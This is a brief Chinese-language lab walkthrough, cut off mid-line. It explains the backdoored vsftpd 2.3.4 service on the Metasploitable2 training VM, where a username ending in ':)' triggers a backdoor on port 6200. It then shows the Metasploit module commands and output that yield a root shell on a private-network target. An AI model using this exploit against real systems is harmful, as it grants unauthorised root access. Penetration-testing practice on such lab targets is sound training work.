Metasploitable2 的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)” [笑脸], 那么在6200端口会监听一个后门. |
msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.111 RHOST => 192.168.1.111 msf exploit(vsftpd_234_backdoor) > run [*] Banner: 220 (vsFTPd 2.3.4) [*] USER: 331 Please specify the password. [+] Backdoor service has been spawned, handling... [+] UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 opened (192.168.1.113 |